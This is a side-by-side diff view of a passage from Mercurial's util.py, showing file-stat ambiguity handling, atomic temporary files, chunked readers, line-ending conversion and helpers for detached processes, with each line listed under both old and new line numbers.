2247 Case (*2) above means that a file was changed twice or more at
2250 same time in sec (= S[n-1].ctime), and comparison of timestamp
2248 same time in sec (= S[n-1].ctime), and comparison of timestamp
2251 is ambiguous.
2249 is ambiguous.
2252
2250
2253 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2251 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2254 timestamp is ambiguous".
2252 timestamp is ambiguous".
2255
2253
2256 But advancing mtime only in case (*2) doesn't work as
2254 But advancing mtime only in case (*2) doesn't work as
2257 expected, because naturally advanced S[n].mtime in case (*1)
2255 expected, because naturally advanced S[n].mtime in case (*1)
2258 might be equal to manually advanced S[n-1 or earlier].mtime.
2256 might be equal to manually advanced S[n-1 or earlier].mtime.
2259
2257
2260 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2258 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2261 treated as ambiguous regardless of mtime, to avoid overlooking
2259 treated as ambiguous regardless of mtime, to avoid overlooking
2262 by confliction between such mtime.
2260 by confliction between such mtime.
2263
2261
2264 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2262 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2265 S[n].mtime", even if size of a file isn't changed.
2263 S[n].mtime", even if size of a file isn't changed.
2266 """
2264 """
2267 try:
2265 try:
2268 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2266 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2269 except AttributeError:
2267 except AttributeError:
2270 return False
2268 return False
2271
2269
2272 def avoidambig(self, path, old):
2270 def avoidambig(self, path, old):
2273 """Change file stat of specified path to avoid ambiguity
2271 """Change file stat of specified path to avoid ambiguity
2274
2272
2275 'old' should be previous filestat of 'path'.
2273 'old' should be previous filestat of 'path'.
2276
2274
2277 This skips avoiding ambiguity, if a process doesn't have
2275 This skips avoiding ambiguity, if a process doesn't have
2278 appropriate privileges for 'path'. This returns False in this
2276 appropriate privileges for 'path'. This returns False in this
2279 case.
2277 case.
2280
2278
2281 Otherwise, this returns True, as "ambiguity is avoided".
2279 Otherwise, this returns True, as "ambiguity is avoided".
2282 """
2280 """
2283 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2281 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2284 try:
2282 try:
2285 os.utime(path, (advanced, advanced))
2283 os.utime(path, (advanced, advanced))
2286 except OSError as inst:
2284 except OSError as inst:
2287 if inst.errno == errno.EPERM:
2285 if inst.errno == errno.EPERM:
2288 # utime() on the file created by another user causes EPERM,
2286 # utime() on the file created by another user causes EPERM,
2289 # if a process doesn't have appropriate privileges
2287 # if a process doesn't have appropriate privileges
2290 return False
2288 return False
2291 raise
2289 raise
2292 return True
2290 return True
2293
2291
2294 def __ne__(self, other):
2292 def __ne__(self, other):
2295 return not self == other
2293 return not self == other
2296
2294
2297 class atomictempfile(object):
2295 class atomictempfile(object):
2298 '''writable file object that atomically updates a file
2296 '''writable file object that atomically updates a file
2299
2297
2300 All writes will go to a temporary copy of the original file. Call
2298 All writes will go to a temporary copy of the original file. Call
2301 close() when you are done writing, and atomictempfile will rename
2299 close() when you are done writing, and atomictempfile will rename
2302 the temporary copy to the original name, making the changes
2300 the temporary copy to the original name, making the changes
2303 visible. If the object is destroyed without being closed, all your
2301 visible. If the object is destroyed without being closed, all your
2304 writes are discarded.
2302 writes are discarded.
2305
2303
2306 checkambig argument of constructor is used with filestat, and is
2304 checkambig argument of constructor is used with filestat, and is
2307 useful only if target file is guarded by any lock (e.g. repo.lock
2305 useful only if target file is guarded by any lock (e.g. repo.lock
2308 or repo.wlock).
2306 or repo.wlock).
2309 '''
2307 '''
2310 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2308 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2311 self.__name = name # permanent name
2309 self.__name = name # permanent name
2312 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2310 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2313 createmode=createmode)
2311 createmode=createmode)
2314 self._fp = posixfile(self._tempname, mode)
2312 self._fp = posixfile(self._tempname, mode)
2315 self._checkambig = checkambig
2313 self._checkambig = checkambig
2316
2314
2317 # delegated methods
2315 # delegated methods
2318 self.read = self._fp.read
2316 self.read = self._fp.read
2319 self.write = self._fp.write
2317 self.write = self._fp.write
2320 self.seek = self._fp.seek
2318 self.seek = self._fp.seek
2321 self.tell = self._fp.tell
2319 self.tell = self._fp.tell
2322 self.fileno = self._fp.fileno
2320 self.fileno = self._fp.fileno
2323
2321
2324 def close(self):
2322 def close(self):
2325 if not self._fp.closed:
2323 if not self._fp.closed:
2326 self._fp.close()
2324 self._fp.close()
2327 filename = localpath(self.__name)
2325 filename = localpath(self.__name)
2328 oldstat = self._checkambig and filestat.frompath(filename)
2326 oldstat = self._checkambig and filestat.frompath(filename)
2329 if oldstat and oldstat.stat:
2327 if oldstat and oldstat.stat:
2330 rename(self._tempname, filename)
2328 rename(self._tempname, filename)
2331 newstat = filestat.frompath(filename)
2329 newstat = filestat.frompath(filename)
2332 if newstat.isambig(oldstat):
2330 if newstat.isambig(oldstat):
2333 # stat of changed file is ambiguous to original one
2331 # stat of changed file is ambiguous to original one
2334 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2332 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2335 os.utime(filename, (advanced, advanced))
2333 os.utime(filename, (advanced, advanced))
2336 else:
2334 else:
2337 rename(self._tempname, filename)
2335 rename(self._tempname, filename)
2338
2336
2339 def discard(self):
2337 def discard(self):
2340 if not self._fp.closed:
2338 if not self._fp.closed:
2341 try:
2339 try:
2342 os.unlink(self._tempname)
2340 os.unlink(self._tempname)
2343 except OSError:
2341 except OSError:
2344 pass
2342 pass
2345 self._fp.close()
2343 self._fp.close()
2346
2344
2347 def __del__(self):
2345 def __del__(self):
2348 if safehasattr(self, '_fp'): # constructor actually did something
2346 if safehasattr(self, '_fp'): # constructor actually did something
2349 self.discard()
2347 self.discard()
2350
2348
2351 def __enter__(self):
2349 def __enter__(self):
2352 return self
2350 return self
2353
2351
2354 def __exit__(self, exctype, excvalue, traceback):
2352 def __exit__(self, exctype, excvalue, traceback):
2355 if exctype is not None:
2353 if exctype is not None:
2356 self.discard()
2354 self.discard()
2357 else:
2355 else:
2358 self.close()
2356 self.close()
2359
2357
2360 def unlinkpath(f, ignoremissing=False):
2358 def unlinkpath(f, ignoremissing=False):
2361 """unlink and remove the directory if it is empty"""
2359 """unlink and remove the directory if it is empty"""
2362 if ignoremissing:
2360 if ignoremissing:
2363 tryunlink(f)
2361 tryunlink(f)
2364 else:
2362 else:
2365 unlink(f)
2363 unlink(f)
2366 # try removing directories that might now be empty
2364 # try removing directories that might now be empty
2367 try:
2365 try:
2368 removedirs(os.path.dirname(f))
2366 removedirs(os.path.dirname(f))
2369 except OSError:
2367 except OSError:
2370 pass
2368 pass
2371
2369
2372 def tryunlink(f):
2370 def tryunlink(f):
2373 """Attempt to remove a file, ignoring ENOENT errors."""
2371 """Attempt to remove a file, ignoring ENOENT errors."""
2374 try:
2372 try:
2375 unlink(f)
2373 unlink(f)
2376 except OSError as e:
2374 except OSError as e:
2377 if e.errno != errno.ENOENT:
2375 if e.errno != errno.ENOENT:
2378 raise
2376 raise
2379
2377
2380 def makedirs(name, mode=None, notindexed=False):
2378 def makedirs(name, mode=None, notindexed=False):
2381 """recursive directory creation with parent mode inheritance
2379 """recursive directory creation with parent mode inheritance
2382
2380
2383 Newly created directories are marked as "not to be indexed by
2381 Newly created directories are marked as "not to be indexed by
2384 the content indexing service", if ``notindexed`` is specified
2382 the content indexing service", if ``notindexed`` is specified
2385 for "write" mode access.
2383 for "write" mode access.
2386 """
2384 """
2387 try:
2385 try:
2388 makedir(name, notindexed)
2386 makedir(name, notindexed)
2389 except OSError as err:
2387 except OSError as err:
2390 if err.errno == errno.EEXIST:
2388 if err.errno == errno.EEXIST:
2391 return
2389 return
2392 if err.errno != errno.ENOENT or not name:
2390 if err.errno != errno.ENOENT or not name:
2393 raise
2391 raise
2394 parent = os.path.dirname(os.path.abspath(name))
2392 parent = os.path.dirname(os.path.abspath(name))
2395 if parent == name:
2393 if parent == name:
2396 raise
2394 raise
2397 makedirs(parent, mode, notindexed)
2395 makedirs(parent, mode, notindexed)
2398 try:
2396 try:
2399 makedir(name, notindexed)
2397 makedir(name, notindexed)
2400 except OSError as err:
2398 except OSError as err:
2401 # Catch EEXIST to handle races
2399 # Catch EEXIST to handle races
2402 if err.errno == errno.EEXIST:
2400 if err.errno == errno.EEXIST:
2403 return
2401 return
2404 raise
2402 raise
2405 if mode is not None:
2403 if mode is not None:
2406 os.chmod(name, mode)
2404 os.chmod(name, mode)
2407
2405
2408 def readfile(path):
2406 def readfile(path):
2409 with open(path, 'rb') as fp:
2407 with open(path, 'rb') as fp:
2410 return fp.read()
2408 return fp.read()
2411
2409
2412 def writefile(path, text):
2410 def writefile(path, text):
2413 with open(path, 'wb') as fp:
2411 with open(path, 'wb') as fp:
2414 fp.write(text)
2412 fp.write(text)
2415
2413
2416 def appendfile(path, text):
2414 def appendfile(path, text):
2417 with open(path, 'ab') as fp:
2415 with open(path, 'ab') as fp:
2418 fp.write(text)
2416 fp.write(text)
2419
2417
2420 class chunkbuffer(object):
2418 class chunkbuffer(object):
2421 """Allow arbitrary sized chunks of data to be efficiently read from an
2419 """Allow arbitrary sized chunks of data to be efficiently read from an
2422 iterator over chunks of arbitrary size."""
2420 iterator over chunks of arbitrary size."""
2423
2421
2424 def __init__(self, in_iter):
2422 def __init__(self, in_iter):
2425 """in_iter is the iterator that's iterating over the input chunks."""
2423 """in_iter is the iterator that's iterating over the input chunks."""
2426 def splitbig(chunks):
2424 def splitbig(chunks):
2427 for chunk in chunks:
2425 for chunk in chunks:
2428 if len(chunk) > 2**20:
2426 if len(chunk) > 2**20:
2429 pos = 0
2427 pos = 0
2430 while pos < len(chunk):
2428 while pos < len(chunk):
2431 end = pos + 2 ** 18
2429 end = pos + 2 ** 18
2432 yield chunk[pos:end]
2430 yield chunk[pos:end]
2433 pos = end
2431 pos = end
2434 else:
2432 else:
2435 yield chunk
2433 yield chunk
2436 self.iter = splitbig(in_iter)
2434 self.iter = splitbig(in_iter)
2437 self._queue = collections.deque()
2435 self._queue = collections.deque()
2438 self._chunkoffset = 0
2436 self._chunkoffset = 0
2439
2437
2440 def read(self, l=None):
2438 def read(self, l=None):
2441 """Read L bytes of data from the iterator of chunks of data.
2439 """Read L bytes of data from the iterator of chunks of data.
2442 Returns less than L bytes if the iterator runs dry.
2440 Returns less than L bytes if the iterator runs dry.
2443
2441
2444 If size parameter is omitted, read everything"""
2442 If size parameter is omitted, read everything"""
2445 if l is None:
2443 if l is None:
2446 return ''.join(self.iter)
2444 return ''.join(self.iter)
2447
2445
2448 left = l
2446 left = l
2449 buf = []
2447 buf = []
2450 queue = self._queue
2448 queue = self._queue
2451 while left > 0:
2449 while left > 0:
2452 # refill the queue
2450 # refill the queue
2453 if not queue:
2451 if not queue:
2454 target = 2**18
2452 target = 2**18
2455 for chunk in self.iter:
2453 for chunk in self.iter:
2456 queue.append(chunk)
2454 queue.append(chunk)
2457 target -= len(chunk)
2455 target -= len(chunk)
2458 if target <= 0:
2456 if target <= 0:
2459 break
2457 break
2460 if not queue:
2458 if not queue:
2461 break
2459 break
2462
2460
2463 # The easy way to do this would be to queue.popleft(), modify the
2461 # The easy way to do this would be to queue.popleft(), modify the
2464 # chunk (if necessary), then queue.appendleft(). However, for cases
2462 # chunk (if necessary), then queue.appendleft(). However, for cases
2465 # where we read partial chunk content, this incurs 2 dequeue
2463 # where we read partial chunk content, this incurs 2 dequeue
2466 # mutations and creates a new str for the remaining chunk in the
2464 # mutations and creates a new str for the remaining chunk in the
2467 # queue. Our code below avoids this overhead.
2465 # queue. Our code below avoids this overhead.
2468
2466
2469 chunk = queue[0]
2467 chunk = queue[0]
2470 chunkl = len(chunk)
2468 chunkl = len(chunk)
2471 offset = self._chunkoffset
2469 offset = self._chunkoffset
2472
2470
2473 # Use full chunk.
2471 # Use full chunk.
2474 if offset == 0 and left >= chunkl:
2472 if offset == 0 and left >= chunkl:
2475 left -= chunkl
2473 left -= chunkl
2476 queue.popleft()
2474 queue.popleft()
2477 buf.append(chunk)
2475 buf.append(chunk)
2478 # self._chunkoffset remains at 0.
2476 # self._chunkoffset remains at 0.
2479 continue
2477 continue
2480
2478
2481 chunkremaining = chunkl - offset
2479 chunkremaining = chunkl - offset
2482
2480
2483 # Use all of unconsumed part of chunk.
2481 # Use all of unconsumed part of chunk.
2484 if left >= chunkremaining:
2482 if left >= chunkremaining:
2485 left -= chunkremaining
2483 left -= chunkremaining
2486 queue.popleft()
2484 queue.popleft()
2487 # offset == 0 is enabled by block above, so this won't merely
2485 # offset == 0 is enabled by block above, so this won't merely
2488 # copy via ``chunk[0:]``.
2486 # copy via ``chunk[0:]``.
2489 buf.append(chunk[offset:])
2487 buf.append(chunk[offset:])
2490 self._chunkoffset = 0
2488 self._chunkoffset = 0
2491
2489
2492 # Partial chunk needed.
2490 # Partial chunk needed.
2493 else:
2491 else:
2494 buf.append(chunk[offset:offset + left])
2492 buf.append(chunk[offset:offset + left])
2495 self._chunkoffset += left
2493 self._chunkoffset += left
2496 left -= chunkremaining
2494 left -= chunkremaining
2497
2495
2498 return ''.join(buf)
2496 return ''.join(buf)
2499
2497
2500 def filechunkiter(f, size=131072, limit=None):
2498 def filechunkiter(f, size=131072, limit=None):
2501 """Create a generator that produces the data in the file size
2499 """Create a generator that produces the data in the file size
2502 (default 131072) bytes at a time, up to optional limit (default is
2500 (default 131072) bytes at a time, up to optional limit (default is
2503 to read all data). Chunks may be less than size bytes if the
2501 to read all data). Chunks may be less than size bytes if the
2504 chunk is the last chunk in the file, or the file is a socket or
2502 chunk is the last chunk in the file, or the file is a socket or
2505 some other type of file that sometimes reads less data than is
2503 some other type of file that sometimes reads less data than is
2506 requested."""
2504 requested."""
2507 assert size >= 0
2505 assert size >= 0
2508 assert limit is None or limit >= 0
2506 assert limit is None or limit >= 0
2509 while True:
2507 while True:
2510 if limit is None:
2508 if limit is None:
2511 nbytes = size
2509 nbytes = size
2512 else:
2510 else:
2513 nbytes = min(limit, size)
2511 nbytes = min(limit, size)
2514 s = nbytes and f.read(nbytes)
2512 s = nbytes and f.read(nbytes)
2515 if not s:
2513 if not s:
2516 break
2514 break
2517 if limit:
2515 if limit:
2518 limit -= len(s)
2516 limit -= len(s)
2519 yield s
2517 yield s
2520
2518
2521 class cappedreader(object):
2519 class cappedreader(object):
2522 """A file object proxy that allows reading up to N bytes.
2520 """A file object proxy that allows reading up to N bytes.
2523
2521
2524 Given a source file object, instances of this type allow reading up to
2522 Given a source file object, instances of this type allow reading up to
2525 N bytes from that source file object. Attempts to read past the allowed
2523 N bytes from that source file object. Attempts to read past the allowed
2526 limit are treated as EOF.
2524 limit are treated as EOF.
2527
2525
2528 It is assumed that I/O is not performed on the original file object
2526 It is assumed that I/O is not performed on the original file object
2529 in addition to I/O that is performed by this instance. If there is,
2527 in addition to I/O that is performed by this instance. If there is,
2530 state tracking will get out of sync and unexpected results will ensue.
2528 state tracking will get out of sync and unexpected results will ensue.
2531 """
2529 """
2532 def __init__(self, fh, limit):
2530 def __init__(self, fh, limit):
2533 """Allow reading up to <limit> bytes from <fh>."""
2531 """Allow reading up to <limit> bytes from <fh>."""
2534 self._fh = fh
2532 self._fh = fh
2535 self._left = limit
2533 self._left = limit
2536
2534
2537 def read(self, n=-1):
2535 def read(self, n=-1):
2538 if not self._left:
2536 if not self._left:
2539 return b''
2537 return b''
2540
2538
2541 if n < 0:
2539 if n < 0:
2542 n = self._left
2540 n = self._left
2543
2541
2544 data = self._fh.read(min(n, self._left))
2542 data = self._fh.read(min(n, self._left))
2545 self._left -= len(data)
2543 self._left -= len(data)
2546 assert self._left >= 0
2544 assert self._left >= 0
2547
2545
2548 return data
2546 return data
2549
2547
2550 def readinto(self, b):
2548 def readinto(self, b):
2551 res = self.read(len(b))
2549 res = self.read(len(b))
2552 if res is None:
2550 if res is None:
2553 return None
2551 return None
2554
2552
2555 b[0:len(res)] = res
2553 b[0:len(res)] = res
2556 return len(res)
2554 return len(res)
2557
2555
2558 def unitcountfn(*unittable):
2556 def unitcountfn(*unittable):
2559 '''return a function that renders a readable count of some quantity'''
2557 '''return a function that renders a readable count of some quantity'''
2560
2558
2561 def go(count):
2559 def go(count):
2562 for multiplier, divisor, format in unittable:
2560 for multiplier, divisor, format in unittable:
2563 if abs(count) >= divisor * multiplier:
2561 if abs(count) >= divisor * multiplier:
2564 return format % (count / float(divisor))
2562 return format % (count / float(divisor))
2565 return unittable[-1][2] % count
2563 return unittable[-1][2] % count
2566
2564
2567 return go
2565 return go
2568
2566
2569 def processlinerange(fromline, toline):
2567 def processlinerange(fromline, toline):
2570 """Check that linerange <fromline>:<toline> makes sense and return a
2568 """Check that linerange <fromline>:<toline> makes sense and return a
2571 0-based range.
2569 0-based range.
2572
2570
2573 >>> processlinerange(10, 20)
2571 >>> processlinerange(10, 20)
2574 (9, 20)
2572 (9, 20)
2575 >>> processlinerange(2, 1)
2573 >>> processlinerange(2, 1)
2576 Traceback (most recent call last):
2574 Traceback (most recent call last):
2577 ...
2575 ...
2578 ParseError: line range must be positive
2576 ParseError: line range must be positive
2579 >>> processlinerange(0, 5)
2577 >>> processlinerange(0, 5)
2580 Traceback (most recent call last):
2578 Traceback (most recent call last):
2581 ...
2579 ...
2582 ParseError: fromline must be strictly positive
2580 ParseError: fromline must be strictly positive
2583 """
2581 """
2584 if toline - fromline < 0:
2582 if toline - fromline < 0:
2585 raise error.ParseError(_("line range must be positive"))
2583 raise error.ParseError(_("line range must be positive"))
2586 if fromline < 1:
2584 if fromline < 1:
2587 raise error.ParseError(_("fromline must be strictly positive"))
2585 raise error.ParseError(_("fromline must be strictly positive"))
2588 return fromline - 1, toline
2586 return fromline - 1, toline
2589
2587
2590 bytecount = unitcountfn(
2588 bytecount = unitcountfn(
2591 (100, 1 << 30, _('%.0f GB')),
2589 (100, 1 << 30, _('%.0f GB')),
2592 (10, 1 << 30, _('%.1f GB')),
2590 (10, 1 << 30, _('%.1f GB')),
2593 (1, 1 << 30, _('%.2f GB')),
2591 (1, 1 << 30, _('%.2f GB')),
2594 (100, 1 << 20, _('%.0f MB')),
2592 (100, 1 << 20, _('%.0f MB')),
2595 (10, 1 << 20, _('%.1f MB')),
2593 (10, 1 << 20, _('%.1f MB')),
2596 (1, 1 << 20, _('%.2f MB')),
2594 (1, 1 << 20, _('%.2f MB')),
2597 (100, 1 << 10, _('%.0f KB')),
2595 (100, 1 << 10, _('%.0f KB')),
2598 (10, 1 << 10, _('%.1f KB')),
2596 (10, 1 << 10, _('%.1f KB')),
2599 (1, 1 << 10, _('%.2f KB')),
2597 (1, 1 << 10, _('%.2f KB')),
2600 (1, 1, _('%.0f bytes')),
2598 (1, 1, _('%.0f bytes')),
2601 )
2599 )
2602
2600
2603 class transformingwriter(object):
2601 class transformingwriter(object):
2604 """Writable file wrapper to transform data by function"""
2602 """Writable file wrapper to transform data by function"""
2605
2603
2606 def __init__(self, fp, encode):
2604 def __init__(self, fp, encode):
2607 self._fp = fp
2605 self._fp = fp
2608 self._encode = encode
2606 self._encode = encode
2609
2607
2610 def close(self):
2608 def close(self):
2611 self._fp.close()
2609 self._fp.close()
2612
2610
2613 def flush(self):
2611 def flush(self):
2614 self._fp.flush()
2612 self._fp.flush()
2615
2613
2616 def write(self, data):
2614 def write(self, data):
2617 return self._fp.write(self._encode(data))
2615 return self._fp.write(self._encode(data))
2618
2616
2619 # Matches a single EOL which can either be a CRLF where repeated CR
2617 # Matches a single EOL which can either be a CRLF where repeated CR
2620 # are removed or a LF. We do not care about old Macintosh files, so a
2618 # are removed or a LF. We do not care about old Macintosh files, so a
2621 # stray CR is an error.
2619 # stray CR is an error.
2622 _eolre = remod.compile(br'\r*\n')
2620 _eolre = remod.compile(br'\r*\n')
2623
2621
2624 def tolf(s):
2622 def tolf(s):
2625 return _eolre.sub('\n', s)
2623 return _eolre.sub('\n', s)
2626
2624
2627 def tocrlf(s):
2625 def tocrlf(s):
2628 return _eolre.sub('\r\n', s)
2626 return _eolre.sub('\r\n', s)
2629
2627
2630 def _crlfwriter(fp):
2628 def _crlfwriter(fp):
2631 return transformingwriter(fp, tocrlf)
2629 return transformingwriter(fp, tocrlf)
2632
2630
2633 if pycompat.oslinesep == '\r\n':
2631 if pycompat.oslinesep == '\r\n':
2634 tonativeeol = tocrlf
2632 tonativeeol = tocrlf
2635 fromnativeeol = tolf
2633 fromnativeeol = tolf
2636 nativeeolwriter = _crlfwriter
2634 nativeeolwriter = _crlfwriter
2637 else:
2635 else:
2638 tonativeeol = pycompat.identity
2636 tonativeeol = pycompat.identity
2639 fromnativeeol = pycompat.identity
2637 fromnativeeol = pycompat.identity
2640 nativeeolwriter = pycompat.identity
2638 nativeeolwriter = pycompat.identity
2641
2639
2642 if (pyplatform.python_implementation() == 'CPython' and
2640 if (pyplatform.python_implementation() == 'CPython' and
2643 sys.version_info < (3, 0)):
2641 sys.version_info < (3, 0)):
2644 # There is an issue in CPython that some IO methods do not handle EINTR
2642 # There is an issue in CPython that some IO methods do not handle EINTR
2645 # correctly. The following table shows what CPython version (and functions)
2643 # correctly. The following table shows what CPython version (and functions)
2646 # are affected (buggy: has the EINTR bug, okay: otherwise):
2644 # are affected (buggy: has the EINTR bug, okay: otherwise):
2647 #
2645 #
2648 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2646 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2649 # --------------------------------------------------
2647 # --------------------------------------------------
2650 # fp.__iter__ | buggy | buggy | okay
2648 # fp.__iter__ | buggy | buggy | okay
2651 # fp.read* | buggy | okay [1] | okay
2649 # fp.read* | buggy | okay [1] | okay
2652 #
2650 #
2653 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2651 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2654 #
2652 #
2655 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2653 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2656 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2654 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2657 #
2655 #
2658 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2656 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2659 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2657 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2660 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2658 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2661 # fp.__iter__ but not other fp.read* methods.
2659 # fp.__iter__ but not other fp.read* methods.
2662 #
2660 #
2663 # On modern systems like Linux, the "read" syscall cannot be interrupted
2661 # On modern systems like Linux, the "read" syscall cannot be interrupted
2664 # when reading "fast" files like on-disk files. So the EINTR issue only
2662 # when reading "fast" files like on-disk files. So the EINTR issue only
2665 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2663 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2666 # files approximately as "fast" files and use the fast (unsafe) code path,
2664 # files approximately as "fast" files and use the fast (unsafe) code path,
2667 # to minimize the performance impact.
2665 # to minimize the performance impact.
2668 if sys.version_info >= (2, 7, 4):
2666 if sys.version_info >= (2, 7, 4):
2669 # fp.readline deals with EINTR correctly, use it as a workaround.
2667 # fp.readline deals with EINTR correctly, use it as a workaround.
2670 def _safeiterfile(fp):
2668 def _safeiterfile(fp):
2671 return iter(fp.readline, '')
2669 return iter(fp.readline, '')
2672 else:
2670 else:
2673 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2671 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2674 # note: this may block longer than necessary because of bufsize.
2672 # note: this may block longer than necessary because of bufsize.
2675 def _safeiterfile(fp, bufsize=4096):
2673 def _safeiterfile(fp, bufsize=4096):
2676 fd = fp.fileno()
2674 fd = fp.fileno()
2677 line = ''
2675 line = ''
2678 while True:
2676 while True:
2679 try:
2677 try:
2680 buf = os.read(fd, bufsize)
2678 buf = os.read(fd, bufsize)
2681 except OSError as ex:
2679 except OSError as ex:
2682 # os.read only raises EINTR before any data is read
2680 # os.read only raises EINTR before any data is read
2683 if ex.errno == errno.EINTR:
2681 if ex.errno == errno.EINTR:
2684 continue
2682 continue
2685 else:
2683 else:
2686 raise
2684 raise
2687 line += buf
2685 line += buf
2688 if '\n' in buf:
2686 if '\n' in buf:
2689 splitted = line.splitlines(True)
2687 splitted = line.splitlines(True)
2690 line = ''
2688 line = ''
2691 for l in splitted:
2689 for l in splitted:
2692 if l[-1] == '\n':
2690 if l[-1] == '\n':
2693 yield l
2691 yield l
2694 else:
2692 else:
2695 line = l
2693 line = l
2696 if not buf:
2694 if not buf:
2697 break
2695 break
2698 if line:
2696 if line:
2699 yield line
2697 yield line
2700
2698
2701 def iterfile(fp):
2699 def iterfile(fp):
2702 fastpath = True
2700 fastpath = True
2703 if type(fp) is file:
2701 if type(fp) is file:
2704 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2702 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2705 if fastpath:
2703 if fastpath:
2706 return fp
2704 return fp
2707 else:
2705 else:
2708 return _safeiterfile(fp)
2706 return _safeiterfile(fp)
2709 else:
2707 else:
2710 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2708 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2711 def iterfile(fp):
2709 def iterfile(fp):
2712 return fp
2710 return fp
2713
2711
2714 def iterlines(iterator):
2712 def iterlines(iterator):
2715 for chunk in iterator:
2713 for chunk in iterator:
2716 for line in chunk.splitlines():
2714 for line in chunk.splitlines():
2717 yield line
2715 yield line
2718
2716
2719 def expandpath(path):
2717 def expandpath(path):
2720 return os.path.expanduser(os.path.expandvars(path))
2718 return os.path.expanduser(os.path.expandvars(path))
2721
2719
2722 def hgcmd():
2720 def hgcmd():
2723 """Return the command used to execute current hg
2721 """Return the command used to execute current hg
2724
2722
2725 This is different from hgexecutable() because on Windows we want
2723 This is different from hgexecutable() because on Windows we want
2726 to avoid things opening new shell windows like batch files, so we
2724 to avoid things opening new shell windows like batch files, so we
2727 get either the python call or current executable.
2725 get either the python call or current executable.
2728 """
2726 """
2729 if mainfrozen():
2727 if mainfrozen():
2730 if getattr(sys, 'frozen', None) == 'macosx_app':
2728 if getattr(sys, 'frozen', None) == 'macosx_app':
2731 # Env variable set by py2app
2729 # Env variable set by py2app
2732 return [encoding.environ['EXECUTABLEPATH']]
2730 return [encoding.environ['EXECUTABLEPATH']]
2733 else:
2731 else:
2734 return [pycompat.sysexecutable]
2732 return [pycompat.sysexecutable]
2735 return gethgcmd()
2733 return gethgcmd()
2736
2734
2737 def rundetached(args, condfn):
2735 def rundetached(args, condfn):
2738 """Execute the argument list in a detached process.
2736 """Execute the argument list in a detached process.
2739
2737
2740 condfn is a callable which is called repeatedly and should return
2738 condfn is a callable which is called repeatedly and should return
2741 True once the child process is known to have started successfully.
2739 True once the child process is known to have started successfully.
2742 At this point, the child process PID is returned. If the child
2740 At this point, the child process PID is returned. If the child
2743 process fails to start or finishes before condfn() evaluates to
2741 process fails to start or finishes before condfn() evaluates to
2744 True, return -1.
2742 True, return -1.
2745 """
2743 """
2746 # Windows case is easier because the child process is either
2744 # Windows case is easier because the child process is either
2747 # successfully starting and validating the condition or exiting
2745 # successfully starting and validating the condition or exiting
2748 # on failure. We just poll on its PID. On Unix, if the child
2746 # on failure. We just poll on its PID. On Unix, if the child
2749 # process fails to start, it will be left in a zombie state until
2747 # process fails to start, it will be left in a zombie state until
2750 # the parent wait on it, which we cannot do since we expect a long
2748 # the parent wait on it, which we cannot do since we expect a long
2751 # running process on success. Instead we listen for SIGCHLD telling
2749 # running process on success. Instead we listen for SIGCHLD telling
2752 # us our child process terminated.
2750 # us our child process terminated.
2753 terminated = set()
2751 terminated = set()
2754 def handler(signum, frame):
2752 def handler(signum, frame):
2755 terminated.add(os.wait())
2753 terminated.add(os.wait())
2756 prevhandler = None
2754 prevhandler = None
2757 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2755 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2758 if SIGCHLD is not None:
2756 if SIGCHLD is not None:
2759 prevhandler = signal.signal(SIGCHLD, handler)
2757 prevhandler = signal.signal(SIGCHLD, handler)
2760 try:
2758 try:
2761 pid = spawndetached(args)
2759 pid = spawndetached(args)
2762 while not condfn():
2760 while not condfn():
2763 if ((pid in terminated or not testpid(pid))
2761 if ((pid in terminated or not testpid(pid))
2764 and not condfn()):
2762 and not condfn()):
2765 return -1
2763 return -1
2766 time.sleep(0.1)
2764 time.sleep(0.1)
2767 return pid
2765 return pid
2768 finally:
2766 finally:
2769 if prevhandler is not None:
2767 if prevhandler is not None:
2770 signal.signal(signal.SIGCHLD, prevhandler)
2768 signal.signal(signal.SIGCHLD, prevhandler)
2771
2769
2772 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2770 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2773 """Return the result of interpolating items in the mapping into string s.
2771 """Return the result of interpolating items in the mapping into string s.
2774
2772
2775 prefix is a single character string, or a two character string with
2773 prefix is a single character string, or a two character string with
2776 a backslash as the first character if the prefix needs to be escaped in
2774 a backslash as the first character if the prefix needs to be escaped in
